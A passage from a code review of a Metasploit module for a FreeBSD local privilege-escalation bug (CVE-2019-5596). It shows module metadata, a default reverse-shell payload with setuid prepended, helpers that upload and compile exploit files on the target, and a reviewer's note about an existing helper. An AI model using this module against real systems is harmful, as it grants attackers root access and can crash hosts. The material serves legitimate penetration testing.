modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb

```diff
@@ -0,0 +1,266 @@
+          or cause the system to brick.  If the system reboots, artifacts will
+          remain on disk and require manual cleanup.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die', # msf module
+            'Peter Holm', # original analysis
+            'Karsten König <karsten@secfault-security.com>' # poc and edb module
+          ],
+        'Platform'       => [ 'bsd' ],
+        'Arch'           => [ ARCH_X64, ARCH_CMD ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        => [[ 'Auto', {} ]],
+        'Privileged'     => true,
+        'References'     =>
+          [
+            [ 'EDB', '47829' ],
+            [ 'URL', 'https://www.freebsd.org/security/advisories/FreeBSD-SA-19:02.fd.asc'],
+            [ 'URL', 'https://secfault-security.com/blog/FreeBSD-SA-1902.fd.html'],
+            [ 'CVE', '2019-5596']
+          ],
+        'Notes'         => {
+          'Stability'   => [CRASH_OS_RESTARTS],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS]
+        },
+        'DefaultOptions' => {
+          'WfsDelay' => 3600, # 60min
+          'PAYLOAD' => 'bsd/x64/shell_reverse_tcp',
+          'PrependSetuid' => true,
+        },
+        'DisclosureDate' => "Feb 05 2019",
+        'DefaultTarget'  => 0
+      )
+    )
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptInt.new('Forks',  [ false, 'Number of forks to use', 3 ]),
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptInt.new('Threads',  [ false, 'Number of threads to use', 400 ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  # Simplify and standardize uploading a file
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+  end
+
+  # Simplify uploading and chmoding a file
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+    register_file_for_cleanup path
+  end
+
+  # Simplify uploading and compiling a file
+  def upload_and_compile(path, data, cc_cmd='')
+    upload "#{path}.c", data
+
+    if session.type.eql? 'shell'
+      cc_cmd = "PATH=$PATH:/usr/bin/ #{cc_cmd}"
+    end
+
+    output = cmd_exec cc_cmd
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    register_file_for_cleanup path
+    chmod path
+  end
+
+  def has_cc?
+    command_exists? 'cc'
+  rescue
+    raise 'Unable to check for cc'
+  end
+
+  # Pull the exploit binary or file (.c typically) from our system
+  def exploit_data(file)
+    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-5596', file)
+  end
```

Comment:
`def exploit_data(data_directory, file)` exists in the `Msf::Post::File` mixin now.

```
# grep -rn "def exploit_data" lib/msf/ -A 3
lib/msf/core/post/file.rb:423:  def exploit_data(data_directory, file)
lib/msf/core/post/file.rb-424-    file_path = ::File.join(::Msf::Config.data_directory, "exploits", data_directory, file)
lib/msf/core/post/file.rb-425-    ::File.binread(file_path)
lib/msf/core/post/file.rb-426-  end
```